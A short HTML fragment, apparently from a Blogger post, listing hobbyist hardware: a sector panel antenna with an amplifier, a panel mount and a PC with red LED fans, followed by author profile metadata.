<span style="font-family: trebuchet ms; font-size: 85%;"><b> </b>. 14dbi sector panel antenna with </span><span style="font-family: trebuchet ms; font-size: 85%;">500mw amp<br />
. Standard bombay sapphire panel mount</span><br />
<span style="font-family: trebuchet ms; font-size: 85%;">. Gaping PC with red led fans</span><span style="font-family: trebuchet ms; font-size: 85%;"> <br />
</span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com1